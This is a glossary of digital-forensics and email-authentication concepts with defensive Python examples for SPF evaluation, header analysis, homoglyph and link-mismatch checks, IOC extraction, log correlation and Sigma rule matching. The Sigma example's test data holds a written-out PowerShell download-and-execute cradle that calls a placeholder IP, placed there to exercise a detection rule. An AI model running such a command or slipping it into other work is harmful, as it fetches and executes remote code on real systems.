Knowledge Base
A practical glossary of digital forensics and incident response concepts — explained for practitioners, linked to the tools that use them.
SPF (Sender Policy Framework): A DNS-based email authentication protocol (RFC 7208) in which a domain publishes a TXT record listing the hosts authorized to send mail using that domain as the SMTP envelope sender (MAIL FROM) or HELO identity. SPF checks the envelope, not the visible From header, and a record that needs more than 10 DNS lookups evaluates to permerror rather than pass or fail.
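The following is an added example, not code from the page or from DFIR Platform: an offline SPF evaluator that walks a record's mechanisms for a connecting IP. The zone below is a constructed in-memory stand-in for DNS, and the domains and addresses in it are invented; only ip4, ip6, include and all are implemented, and the lookup limit is enforced so an include loop is reported as permerror.

```python
"""Offline SPF evaluator (added example; the zone is constructed, not real DNS)."""
import ipaddress

# Constructed TXT records keyed by domain. Real evaluation (RFC 7208) resolves
# these with live DNS and counts the DNS-querying mechanisms it follows.
FAKE_DNS_TXT = {
    "example.com": "v=spf1 ip4:192.0.2.0/24 include:_spf.mailer-example.net -all",
    "_spf.mailer-example.net": "v=spf1 ip4:198.51.100.10 ip6:2001:db8::/32 ~all",
    "loop.example": "v=spf1 include:loop.example -all",   # include loop
    "bad.example": "v=spf1 ip4:999.0.0.0/24 -all",       # malformed network
}
MAX_DNS_LOOKUPS = 10  # RFC 7208 section 4.6.4 limit
QUALIFIER_RESULT = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def evaluate_spf(domain, client_ip, dns=FAKE_DNS_TXT, _lookups=None):
    """Return (result, explanation) for client_ip claiming `domain` as its
    MAIL FROM / HELO identity. Only ip4, ip6, include and all are implemented;
    a, mx, ptr, exists and the redirect= modifier come back as permerror so the
    omission is visible instead of silently skipped."""
    if _lookups is None:
        _lookups = [0]  # one counter shared across include recursion
    record = dns.get(domain.lower())
    if record is None or not record.lower().startswith("v=spf1"):
        return "none", f"no SPF record for {domain}"
    ip = ipaddress.ip_address(client_ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in "+-~?":
            qualifier, term = term[0], term[1:]
        mech, _, arg = term.partition(":")
        mech = mech.lower()
        if mech == "all":
            matched = True
        elif mech in ("ip4", "ip6"):
            try:
                # A v4 address is never contained in a v6 network and vice versa.
                matched = ip in ipaddress.ip_network(arg, strict=False)
            except ValueError:
                return "permerror", f"malformed network in {mech}:{arg}"
        elif mech == "include":
            _lookups[0] += 1
            if _lookups[0] > MAX_DNS_LOOKUPS:
                return "permerror", "more than 10 DNS-querying mechanisms"
            sub, _ = evaluate_spf(arg, client_ip, dns, _lookups)
            if sub in ("permerror", "none"):  # RFC 7208 section 5.2
                return "permerror", f"include:{arg} evaluated to {sub}"
            matched = sub == "pass"  # an include matches only on pass
        else:
            return "permerror", f"mechanism {mech} not implemented in this example"
        if matched:
            return QUALIFIER_RESULT[qualifier], f"matched {qualifier}{term}"
    return "neutral", "no mechanism matched"


if __name__ == "__main__":
    for dom, ip in [("example.com", "198.51.100.10"), ("example.com", "203.0.113.5"),
                    ("loop.example", "192.0.2.1"), ("bad.example", "192.0.2.1")]:
        print(dom, ip, evaluate_spf(dom, ip))
```

The include branch is where most real-world SPF failures hide: a third-party mailer's record that is itself malformed, or a chain of includes that crosses the 10-lookup limit, turns a domain's policy into permerror for every receiver.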
DKIM (DomainKeys Identified Mail): An email authentication standard (RFC 6376) in which the signing mail server adds a DKIM-Signature header computed over selected headers and the body with a private key; the receiver fetches the matching public key from DNS (selector._domainkey under the d= domain) and verifies that the signed parts were not altered in transit and were signed by a key under that domain's control. A valid signature proves which domain signed the message, which only vouches for the visible From when the d= domain aligns with it.
DMARC (Domain-based Message Authentication, Reporting, and Conformance): An email authentication protocol (RFC 7489) that builds on SPF and DKIM by requiring the authenticated identifier (the SPF envelope domain or the DKIM d= domain) to align with the domain in the From header, lets domain owners publish a policy (p=none, quarantine, or reject) for messages that fail, and enables aggregate (rua) and failure (ruf) reporting so owners can see who is sending as their domain.
ARC (Authenticated Received Chain): RFC 8617 preserves email authentication results across forwarding hops such as mailing lists and forwarders, which otherwise break SPF (new sending IP) and often DKIM (modified body or subject), so the final receiver can evaluate the original authentication state, provided it trusts the intermediaries that sealed the chain.
Email header analysis: The process of examining RFC 5322 email headers to trace a message's delivery path (Received headers, read from the bottom up because each MTA prepends its own), verify authentication results (the Authentication-Results header added by your own receiving server; any such header already present in an inbound message can be forged by the sender), and identify anomalies such as a Return-Path or Reply-To domain that differs from the From domain.
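An added example for the SPF, DKIM, DMARC and header-analysis entries above, not code from the page or from DFIR Platform: it parses a constructed message with the standard library, reconstructs the Received chain in delivery order, reads only the Authentication-Results header stamped by a named trusted receiver (RFC 8601), and applies relaxed DMARC identifier alignment (RFC 7489). The message, hosts and domains are invented, and the organizational-domain helper is a deliberate simplification noted in the code.

```python
"""Email header analysis on a constructed message (added example)."""
import email
import re
from email import policy
from email.utils import parseaddr

# Constructed sample: the visible From claims example.com, but the envelope
# sender (Return-Path) and the DKIM signing domain belong to another domain.
RAW_EMAIL = """\
Return-Path: <bounce@mailer.attacker-example.net>
Received: from mx2.receiver-example.org (mx2.receiver-example.org [192.0.2.20])
\tby inbox.receiver-example.org with ESMTPS id abc123; Mon, 3 Jun 2024 10:00:05 +0000
Received: from mail.attacker-example.net (mail.attacker-example.net [198.51.100.7])
\tby mx2.receiver-example.org with ESMTP id xyz789; Mon, 3 Jun 2024 10:00:02 +0000
Authentication-Results: mx2.receiver-example.org;
\tspf=pass smtp.mailfrom=attacker-example.net;
\tdkim=pass header.d=attacker-example.net;
\tdmarc=fail header.from=example.com
From: "Finance Team" <finance@example.com>
To: victim@receiver-example.org
Subject: Updated wire instructions

Please review the attached wire instructions.
"""

RECEIVED_RE = re.compile(r"from\s+(\S+).*?\bby\s+(\S+)", re.DOTALL)


def org_domain(domain):
    """Organizational domain, simplified to the last two labels. Real DMARC
    evaluation uses the Public Suffix List (example.co.uk needs three labels)."""
    return ".".join(domain.lower().strip(".").split(".")[-2:])


def parse_auth_results(value):
    """Parse an RFC 8601 Authentication-Results value into
    (authserv_id, {method: {"result": ..., "<ptype.property>": ...}}).
    Comments in parentheses are not handled in this example."""
    parts = [p.strip() for p in value.split(";") if p.strip()]
    authserv_id = parts[0].split()[0]
    results = {}
    for part in parts[1:]:
        tokens = part.split()
        method, _, result = tokens[0].partition("=")
        props = {"result": result.lower()}
        for tok in tokens[1:]:
            key, _, val = tok.partition("=")
            if val:
                props[key.lower()] = val.lower()
        results[method.lower()] = props
    return authserv_id, results


def received_chain(msg):
    """Delivery path in chronological order: MTAs prepend Received headers,
    so the header nearest the body is the earliest hop."""
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        m = RECEIVED_RE.search(str(value))
        if m:
            hops.append((m.group(1), m.group(2)))
    return hops


def dmarc_alignment(from_domain, auth):
    """Relaxed alignment (RFC 7489 section 3.1): DMARC passes if SPF or DKIM
    passed and that identifier shares the From organizational domain."""
    spf, dkim = auth.get("spf", {}), auth.get("dkim", {})
    spf_id = spf.get("smtp.mailfrom", "").rpartition("@")[2]
    spf_ok = spf.get("result") == "pass" and org_domain(spf_id) == org_domain(from_domain)
    dkim_ok = dkim.get("result") == "pass" and org_domain(dkim.get("header.d", "")) == org_domain(from_domain)
    return {"spf_aligned": spf_ok, "dkim_aligned": dkim_ok, "dmarc_pass": spf_ok or dkim_ok}


def analyze_headers(raw, trusted_authserv):
    """Return path, trusted authentication results, alignment and findings.
    Authentication-Results headers whose authserv-id is not ours are ignored,
    because a sender can simply add a forged one before delivery."""
    msg = email.message_from_string(raw, policy=policy.default)
    from_domain = parseaddr(str(msg["From"]))[1].rpartition("@")[2]
    rp_domain = parseaddr(str(msg.get("Return-Path", "")))[1].rpartition("@")[2]
    auth = {}
    for value in msg.get_all("Authentication-Results", []):
        authserv_id, results = parse_auth_results(str(value))
        if authserv_id.lower() == trusted_authserv.lower():
            auth.update(results)
    findings = []
    if rp_domain and org_domain(rp_domain) != org_domain(from_domain):
        findings.append(f"Return-Path domain {rp_domain} differs from From domain {from_domain}")
    alignment = dmarc_alignment(from_domain, auth)
    if not alignment["dmarc_pass"]:
        findings.append("DMARC fails: neither SPF nor DKIM identifier aligns with the From domain")
    return {"from_domain": from_domain, "return_path_domain": rp_domain,
            "hops": received_chain(msg), "auth": auth, "alignment": alignment, "findings": findings}


if __name__ == "__main__":
    for key, val in analyze_headers(RAW_EMAIL, "mx2.receiver-example.org").items():
        print(f"{key}: {val}")
```

Note that SPF and DKIM both pass here, yet DMARC fails: the attacker controls attacker-example.net and can authenticate it perfectly. Alignment with the From domain, not a bare spf=pass or dkim=pass, is the check that matters when triaging a suspected spoof.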
Homoglyph (IDN homograph) domains: Domains that substitute visually identical or near-identical Unicode characters (for example Cyrillic а, U+0430, for Latin a) for Latin letters to impersonate legitimate domains while appearing genuine to end users. Such names are registered and resolved in their punycode form (labels prefixed xn--), so decoding a punycode label and checking it for mixed scripts or known confusable characters exposes the impersonation.
Email spoofing: The forgery of email header fields, most commonly the From address, to make a message appear to originate from a sender other than its true source. SMTP itself does not authenticate the From header; exact-domain spoofing is blocked only when the impersonated domain publishes DMARC with an enforcing policy (quarantine or reject) and the receiver honours it, which is why attackers increasingly fall back to lookalike domains and display-name tricks.
Link mismatch (deceptive hyperlink): A phishing technique where the visible anchor text of an HTML email hyperlink shows a different URL than the actual href destination the user is sent to on click. Comparing the host shown in the anchor text with the host in the href, and with the final destination after any redirects, is a standard phishing-analysis check.
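The following added example (not the page's or DFIR Platform's code) implements the two checks described in the homoglyph and link-mismatch entries above: it extracts anchors from a constructed HTML body, flags anchors whose visible host differs from the href host, and reduces each href host to a comparison skeleton (punycode decoded, NFKC-normalized, known confusables folded to Latin) to catch lookalikes of a protected domain. The HTML, hosts and brand list are invented, and the confusables table is a small illustrative subset of Unicode TR39.

```python
"""Link-mismatch and homoglyph checks on a constructed HTML body (added example)."""
import unicodedata
from html.parser import HTMLParser
from urllib.parse import urlparse

# Punycode form of example.com with a Cyrillic а (U+0430) replacing Latin a,
# computed here rather than hand-typed so the label is exact.
PUNY_HOST = "ex\u0430mple.com".encode("idna").decode("ascii")

# Constructed email body: one plain mismatch, one Unicode lookalike, one
# punycode lookalike, and one honest link.
SAMPLE_HTML = f"""
<p>Your invoice is ready. Review it at
<a href="http://login-example.attacker-example.net/x">https://portal.example.com/invoices</a>
or sign in at <a href="https://ex\u0430mple.com/login">example.com</a>
or read the <a href="https://{PUNY_HOST}/">help</a> page.</p>
<a href="https://www.example.com/docs">https://www.example.com/docs</a>
"""

PROTECTED = {"example.com"}  # the brand domains we defend (constructed)

# Small confusables subset: Cyrillic/Greek letters that render like Latin ones.
CONFUSABLES = {"\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
               "\u0445": "x", "\u0443": "y", "\u0456": "i", "\u04cf": "l",
               "\u03bf": "o", "\u03bd": "v"}


class LinkExtractor(HTMLParser):
    """Collect (href, visible anchor text) pairs from an HTML body."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href"), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def skeleton(host):
    """Comparison form of a host: xn-- labels decoded to Unicode, NFKC
    normalized, confusables folded onto Latin."""
    host = host.lower()
    if host.isascii():
        try:
            host = host.encode("ascii").decode("idna")
        except UnicodeError:
            pass
    host = unicodedata.normalize("NFKC", host)
    return "".join(CONFUSABLES.get(ch, ch) for ch in host)


def registered(host):
    """Registrable domain, simplified to the last two labels (real code uses
    the Public Suffix List)."""
    return ".".join(host.split(".")[-2:])


def analyze_links(html):
    """Return one finding per anchor with the issues detected for it."""
    extractor = LinkExtractor()
    extractor.feed(html)
    findings = []
    for href, text in extractor.links:
        host = (urlparse(href).hostname or "").lower()
        issues = []
        # 1. Link mismatch: the anchor text names a host other than the href host.
        shown = urlparse(text if "://" in text else "http://" + text).hostname or ""
        if "." in shown and registered(shown.lower()) != registered(host):
            issues.append("link_mismatch")
        # 2. Homoglyph: a non-ASCII or punycode host whose skeleton collides
        #    with a protected domain it is not actually equal to.
        sk = skeleton(host)
        if (not host.isascii() or "xn--" in host) and registered(sk) in PROTECTED and sk != host:
            issues.append("homoglyph")
        findings.append({"href": href, "text": text, "host": host, "issues": issues})
    return findings


if __name__ == "__main__":
    for f in analyze_links(SAMPLE_HTML):
        print(f["host"], f["issues"])
```

The skeleton comparison is deliberately one-directional: it asks whether an attacker-controlled host collapses onto a domain you own, which keeps the confusables table small and the false-positive rate low compared with flagging every non-ASCII host.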
IOC enrichment: The process of augmenting raw indicators of compromise with contextual threat intelligence (reputation scores, WHOIS and passive DNS history, sandbox verdicts, associated campaigns and ATT&CK techniques) to assess their severity, origin, and relevance to the environment being defended.
Attack surface management (ASM): The continuous process of discovering, inventorying, and reducing an organization's externally exposed digital assets (domains, certificates, IP ranges, cloud services, open ports) to minimize exploitable entry points, including assets the organization did not know it owned.
Indicators of compromise (IOCs): Observable artifacts, such as IPs, domains, file hashes, URLs, file paths, and registry keys, that indicate a system or network may have been breached. Atomic indicators such as hashes and IPs are cheap for an adversary to rotate, so they age quickly; behavioural indicators (tools and TTPs) are more durable, which is why they sit higher on the pyramid of pain.
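An added example for the IOC entry above, not code from the page or from DFIR Platform: it extracts and classifies indicators from a constructed incident note, refanging the defanged forms analysts commonly share (hxxp, [.], [at]) and validating IPs so version strings and malformed octets are not mistaken for addresses. The report text, hosts and addresses are invented; the two hashes are the well-known digests of the empty file, used only as placeholders.

```python
"""IOC extraction from a constructed incident note (added example)."""
import ipaddress
import re
from urllib.parse import urlparse

# Constructed report text with defanged indicators. The hashes are the
# well-known empty-file digests, used here as placeholders.
SAMPLE_REPORT = """
The loader was fetched from hxxps://cdn[.]attacker-example[.]net/update.bin
(sha256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855)
and beaconed to 198[.]51[.]100[.]23 on TCP/8443. Dropper md5: d41d8cd98f00b204e9800998ecf8427e.
The lure came from billing[at]attacker-example[.]net. Lateral movement reached 10.0.0.5.
"""

PATTERNS = {
    "url": re.compile(r"\bhttps?://[^\s'\"<>()]+", re.I),
    "email": re.compile(r"\b[\w.+-]+@(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I),
    "sha256": re.compile(r"\b[a-f0-9]{64}\b", re.I),
    "sha1": re.compile(r"\b[a-f0-9]{40}\b", re.I),
    "md5": re.compile(r"\b[a-f0-9]{32}\b", re.I),
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "domain": re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I),
}
# Address ranges treated as internal (RFC 1918, loopback, link-local) so a
# pivot target is kept separate from external infrastructure to block.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def refang(text):
    """Undo the common defanging conventions so patterns match normally."""
    text = re.sub(r"hxxp", "http", text, flags=re.I)
    for bad, good in (("[.]", "."), ("(.)", "."), ("{.}", "."), ("\\.", "."),
                      ("[:]", ":"), ("[at]", "@"), ("[@]", "@")):
        text = text.replace(bad, good)
    return text


def is_internal(ip):
    return any(ip in net for net in INTERNAL_NETS)


def extract_iocs(report):
    """Return {kind: sorted list}. Compound indicators (URLs, emails) are
    consumed first so their parts are not re-matched as bare domains; hosts
    from them are still recorded as domain IOCs."""
    text = refang(report)
    found = {k: set() for k in list(PATTERNS) + ["ipv4_private"]}
    for kind in ("url", "email"):
        for m in PATTERNS[kind].findall(text):
            value = m.rstrip(".,;")
            found[kind].add(value)
            host = urlparse(value).hostname if kind == "url" else value.rpartition("@")[2]
            if host and PATTERNS["domain"].fullmatch(host):
                found["domain"].add(host.lower())
        text = PATTERNS[kind].sub(" ", text)
    for kind in ("sha256", "sha1", "md5"):
        found[kind].update(h.lower() for h in PATTERNS[kind].findall(text))
        text = PATTERNS[kind].sub(" ", text)
    for m in PATTERNS["ipv4"].findall(text):
        try:
            ip = ipaddress.ip_address(m)
        except ValueError:
            continue  # e.g. 999.1.2.3 or a four-part version number
        found["ipv4_private" if is_internal(ip) else "ipv4"].add(m)
    text = PATTERNS["ipv4"].sub(" ", text)
    found["domain"].update(d.lower() for d in PATTERNS["domain"].findall(text))
    return {k: sorted(v) for k, v in found.items()}


if __name__ == "__main__":
    for kind, values in extract_iocs(SAMPLE_REPORT).items():
        print(f"{kind:13} {values}")
```

Running hashes before IPs and domains, and stripping each matched class from the working text, is what keeps a 64-character SHA-256 from also surfacing as a 32-character MD5 and a URL path from yielding a fake domain such as update.bin.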
Threat intelligence: Evidence-based knowledge (context, indicators, mechanisms, implications, and actionable advice) about existing or emerging cyber threats, used to inform and improve security decisions at the strategic, operational, and tactical levels.
Certificate Transparency (CT): A public, append-only logging framework (RFC 6962) in which certificate authorities submit the certificates they issue; browsers require publicly trusted certificates to be logged, so monitoring CT logs for your domains detects unauthorized issuance and reveals attacker infrastructure, including lookalike domains, as soon as it obtains a certificate.
Passive DNS: A historical record of DNS resolutions collected by network sensors, allowing analysts to query past domain-to-IP mappings (and the reverse) without making active queries that could tip off the adversary. Coverage depends on where the sensors sit, so a missing record is not proof that a resolution never occurred.
WHOIS: A protocol and distributed database system for querying domain registration information, including registrant details, registration and expiration dates, name servers, and registrar data. Much registrant data is now redacted under privacy rules, and RDAP is the structured, JSON-based successor protocol that most registries also serve.
Domain reputation: A score or classification assigned to a domain based on historical behavior, threat intelligence associations, and observed malicious activity; domain age is a common input, since phishing and command-and-control domains are often registered days before first use.
IP reputation: A score or classification assigned to an IP address based on observed malicious activity, abuse reports, and aggregated threat intelligence feeds. Shared hosting, CDNs, and carrier-grade NAT put many unrelated tenants behind one address, so a score is a signal to corroborate rather than a verdict.
Threat actor profiling: The process of identifying, attributing, and documenting the tactics, techniques, infrastructure, and motivations of specific threat groups, usually expressed in a shared vocabulary such as MITRE ATT&CK so that activity can be compared across incidents and vendors.
DNS security: Practices and technologies for protecting DNS infrastructure and leveraging DNS data for threat detection, including DNSSEC (signed records that resist spoofing), DNS filtering (blocking resolution of known-bad domains), and DNS-based email authentication records (SPF, DKIM, DMARC).
SSL/TLS certificates: Digital certificates issued by Certificate Authorities that bind a public key to a server's identity (its DNS names) so that clients can authenticate the server during the TLS handshake. The certificate itself does not encrypt traffic; the handshake's key exchange does. Certificate fields such as subject alternative names, issuer, validity period, and serial number are useful pivots for tracking attacker infrastructure.
Open ports: Network ports on a host that are actively accepting connections, each exposing an underlying service that may be exploited if misconfigured, unpatched, or unnecessarily internet-facing. Management services reachable from the internet (SSH, RDP, database listeners, admin consoles) are the usual priority findings.
Vulnerability scanning: The automated process of identifying known security weaknesses in systems, applications, and network infrastructure by comparing discovered services against vulnerability databases. Unauthenticated scans infer vulnerabilities from banners and version strings and produce false positives; authenticated scans read installed package versions directly and are far more accurate.
Phishing email analysis: The forensic examination of suspected phishing emails to identify deceptive techniques (spoofed or lookalike senders, link mismatches, urgency lures), malicious infrastructure (URLs, hosting, redirectors, credential-capture pages), and attribution indicators. It should be performed on the raw message with full headers, since a forwarded copy discards the original headers.
Digital forensics: The scientific discipline of identifying, preserving, analyzing, and presenting digital evidence from computers, networks, and devices, while maintaining chain of custody and working from verified copies so that the evidence remains admissible.
Incident response: The organized approach to preparing for, detecting, containing, eradicating, and recovering from security incidents, followed by post-incident review to improve detection and prevention (the phases described in NIST SP 800-61).
Timeline analysis: The process of reconstructing a chronological sequence of events during a security investigation to understand the full attack chain, which requires normalizing timestamps from every source to a single zone (usually UTC) and accounting for clock skew between hosts.
Log analysis: The examination of system, application, and network logs to detect anomalies, reconstruct events, and identify indicators of compromise. Correlating sources that cover the same time window turns isolated alerts into an attack narrative.
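The following is an added example for the timeline-analysis and log-analysis entries above, not code from the page or from DFIR Platform. It parses two constructed log sources with different timestamp conventions (syslog lines with no year in an assumed UTC+2 host zone, and JSON events already in UTC), merges them into one UTC timeline, and runs a brute-force-then-success correlation over the SSH events. All log lines, hosts and addresses are invented.

```python
"""Timeline normalization and a brute-force correlation over constructed logs
(added example)."""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed sample logs. Syslog lines carry no year and are in the host's
# local zone (assumed UTC+2 below); the JSON events are ISO-8601 UTC.
AUTH_LOG = """\
Jun  3 11:58:01 bastion sshd[4120]: Failed password for invalid user admin from 203.0.113.9 port 51522 ssh2
Jun  3 11:58:03 bastion sshd[4121]: Failed password for invalid user admin from 203.0.113.9 port 51530 ssh2
Jun  3 11:58:06 bastion sshd[4122]: Failed password for root from 203.0.113.9 port 51541 ssh2
Jun  3 11:58:09 bastion sshd[4123]: Failed password for root from 203.0.113.9 port 51544 ssh2
Jun  3 11:58:12 bastion sshd[4124]: Failed password for root from 203.0.113.9 port 51550 ssh2
Jun  3 11:58:20 bastion sshd[4125]: Accepted password for root from 203.0.113.9 port 51563 ssh2
Jun  3 12:01:44 bastion sshd[4130]: Failed password for alice from 192.0.2.44 port 40011 ssh2
"""
JSON_EVENTS = """\
{"ts": "2024-06-03T09:58:25Z", "source": "edr", "host": "bastion", "msg": "Process started: /tmp/.x/cron.sh"}
{"ts": "2024-06-03T09:58:40Z", "source": "edr", "host": "bastion", "msg": "Outbound connection to 203.0.113.9:4444"}
"""

SYSLOG_RE = re.compile(r"^(?P<mon>\w{3})\s+(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) "
                       r"(?P<host>\S+) (?P<proc>[^:]+): (?P<msg>.*)$")
FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")
ACCEPTED_RE = re.compile(r"Accepted \w+ for (?P<user>\S+) from (?P<ip>\S+)")


def parse_syslog(text, year, host_tz):
    """Syslog omits the year and zone; both must be supplied from context."""
    events = []
    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        local = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}",
                                  "%Y %b %d %H:%M:%S").replace(tzinfo=host_tz)
        events.append({"ts": local.astimezone(timezone.utc), "source": "auth.log",
                       "host": m["host"], "msg": m["msg"]})
    return events


def parse_jsonl(text):
    events = []
    for line in text.splitlines():
        if line.strip():
            rec = json.loads(line)
            ts = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00")).astimezone(timezone.utc)
            events.append({"ts": ts, "source": rec["source"], "host": rec["host"], "msg": rec["msg"]})
    return events


def build_timeline(*event_lists):
    """Merge every source into one list ordered by normalized UTC time."""
    return sorted((e for lst in event_lists for e in lst), key=lambda e: e["ts"])


def detect_bruteforce(timeline, threshold=5, window=timedelta(minutes=5)):
    """Alert when a source IP accumulates `threshold` failures inside `window`
    and then gets an Accepted login: brute force that succeeded."""
    failures, alerts = defaultdict(list), []
    for e in timeline:
        if e["source"] != "auth.log":
            continue
        m = FAILED_RE.search(e["msg"])
        if m:
            failures[m["ip"]].append(e["ts"])
            continue
        m = ACCEPTED_RE.search(e["msg"])
        if m:
            recent = [t for t in failures[m["ip"]] if e["ts"] - t <= window]
            if len(recent) >= threshold:
                alerts.append({"ip": m["ip"], "user": m["user"],
                               "failures": len(recent), "success_at": e["ts"]})
    return alerts


def run():
    host_tz = timezone(timedelta(hours=2))  # assumed zone of the syslog host
    timeline = build_timeline(parse_syslog(AUTH_LOG, 2024, host_tz), parse_jsonl(JSON_EVENTS))
    return timeline, detect_bruteforce(timeline)


if __name__ == "__main__":
    timeline, alerts = run()
    for e in timeline:
        print(e["ts"].strftime("%Y-%m-%dT%H:%M:%SZ"), f"{e['source']:<8}", e["host"], e["msg"])
    print(alerts)
```

Without the zone correction the EDR events would appear two hours before the SSH activity and the narrative (brute force, login, dropped script, outbound connection to the same attacker IP) would not line up at all.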
Malware analysis: The process of examining malicious software to understand its behavior, origin, capabilities, and impact, including static analysis (strings, imports, signatures, disassembly, without execution) and dynamic analysis (execution in an isolated sandbox to observe file, registry, process, and network activity, bearing in mind that malware may detect the sandbox and alter its behavior).
MITRE ATT&CK: A globally accessible knowledge base of adversary tactics, techniques, and procedures (TTPs) based on real-world observations, organized into tactics (the adversary's goal), techniques and sub-techniques (how the goal is achieved, for example T1059.001 PowerShell), and procedures (specific observed implementations), used to understand, detect, and respond to cyber threats.
Sigma: A vendor-agnostic, open YAML format for writing detection rules over log events; converters such as sigma-cli with pySigma backends translate a rule into the query languages of the SIEMs and EDRs they support, so one rule can be shared and reviewed independently of any product.
YARA: A pattern-matching tool for identifying and classifying malware based on textual or binary patterns found in files or memory; a rule combines strings (text, hex, or regular expressions) with a boolean condition over them, and is used for classification, hunting on disk, and memory scanning.
Threat hunting: The proactive, hypothesis-driven search for adversary activity that has evaded existing security controls, starting from a hypothesis about attacker behavior and the telemetry needed to test it, with confirmed findings converted into new detections.
Alert triage: The process of evaluating, prioritizing, and routing security alerts to determine which require investigation and which are false positives, typically weighing the severity of the detection, the criticality of the asset, and corroborating evidence from other sources.
SIEM: Security Information and Event Management, a platform that aggregates, correlates, and analyzes log data from across an organization's infrastructure to detect threats and support incident response.
SOAR: Security Orchestration, Automation, and Response, platforms that automate security operations by connecting tools, running playbooks, and coordinating incident response workflows so that routine enrichment and containment steps do not wait on an analyst.
Detection-as-code: The practice of managing detection rules as version-controlled code, applying software engineering principles such as testing, peer review, and CI/CD to detection engineering; unit tests that replay sample events against each rule catch regressions before a change reaches production.
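An added example for the Sigma and detection-as-code entries above, not code from the page, from DFIR Platform, or from the Sigma project: a minimal matcher for the Sigma detection model (field modifiers such as contains, startswith, endswith and all; a selection as an AND of fields; a condition combining named selections with and, or, not) applied to constructed process-creation events, plus the regression check a CI job would run. The rule is written as the Python equivalent of the YAML structure so the block needs no YAML parser, and the rule, events and paths are invented for illustration.

```python
"""Minimal Sigma-style rule matcher and regression check (added example)."""
import re

# Python rendering of a Sigma rule's YAML structure (title, logsource,
# detection, condition). The filter selection is constructed for illustration.
RULE = {
    "title": "PowerShell Download Cradle",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
            "CommandLine|contains|all": ["New-Object", "Net.WebClient", "DownloadString"],
        },
        "filter_rmm": {"ParentImage|endswith": "\\rmm-agent.exe"},
        "condition": "selection and not filter_rmm",
    },
    "level": "high",
    "tags": ["attack.execution", "attack.t1059.001"],
}

# Constructed sample events in the field names Sigma uses for process creation.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
CRADLE = "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a')\""
EVENTS = [
    {"Image": PS, "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": CRADLE},
    {"Image": PS, "ParentImage": "C:\\Program Files\\RMM\\rmm-agent.exe", "CommandLine": CRADLE},
    {"Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "cmd /c whoami"},
    {"Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "pwsh -c Get-Process"},
]
EXPECTED = [True, False, False, False]


def field_matches(event, key, expected):
    """Apply one 'Field|modifier|...' entry. Sigma string matching is
    case-insensitive; a list is OR unless the 'all' modifier is present."""
    field, *mods = key.split("|")
    value = str(event.get(field, "")).lower()
    patterns = expected if isinstance(expected, list) else [expected]

    def one(pattern):
        p = str(pattern).lower()
        if "contains" in mods:
            return p in value
        if "startswith" in mods:
            return value.startswith(p)
        if "endswith" in mods:
            return value.endswith(p)
        return value == p

    return all(one(p) for p in patterns) if "all" in mods else any(one(p) for p in patterns)


def selection_matches(event, selection):
    """A selection map is an AND of its fields; a list of maps is an OR."""
    if isinstance(selection, list):
        return any(selection_matches(event, s) for s in selection)
    return all(field_matches(event, k, v) for k, v in selection.items())


def eval_condition(condition, results):
    """Evaluate 'a and (b or not c)' over named selection results with a small
    recursive-descent parser (no eval). '1 of sel*' style quantifiers are not
    supported in this example."""
    tokens, pos = re.findall(r"\(|\)|\w+", condition), [0]

    def peek():
        return tokens[pos[0]] if pos[0] < len(tokens) else None

    def take():
        pos[0] += 1
        return tokens[pos[0] - 1]

    def factor():
        tok = take()
        if tok == "not":
            return not factor()
        if tok == "(":
            val = expr()
            take()  # closing parenthesis
            return val
        return results[tok]

    def term():
        val = factor()
        while peek() == "and":
            take()
            val = factor() and val  # factor() first so tokens are consumed
        return val

    def expr():
        val = term()
        while peek() == "or":
            take()
            val = term() or val
        return val

    return expr()


def rule_matches(rule, event):
    det = rule["detection"]
    results = {name: selection_matches(event, sel) for name, sel in det.items() if name != "condition"}
    return eval_condition(det["condition"], results)


def run_regression(rule, cases):
    """Detection-as-code gate: replay (event, expected) pairs and return the
    mismatches as (index, expected, actual); CI fails the rule if any remain."""
    return [(i, want, rule_matches(rule, ev)) for i, (ev, want) in enumerate(cases)
            if rule_matches(rule, ev) != want]


if __name__ == "__main__":
    print([rule_matches(RULE, e) for e in EVENTS])
    print("regression failures:", run_regression(RULE, list(zip(EVENTS, EXPECTED))))
```

The second event is the reason the regression set exists: a filter that exempts a remote-management tool is exactly the kind of change that silently blinds a rule when the ParentImage value is later edited, and a replayed true-positive case catches it at review time.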
API security: The practices and controls for protecting application programming interfaces from unauthorized access, data exposure, and abuse, with broken object-level authorization, excessive data exposure, and missing rate limiting among the most common findings (see the OWASP API Security Top 10).
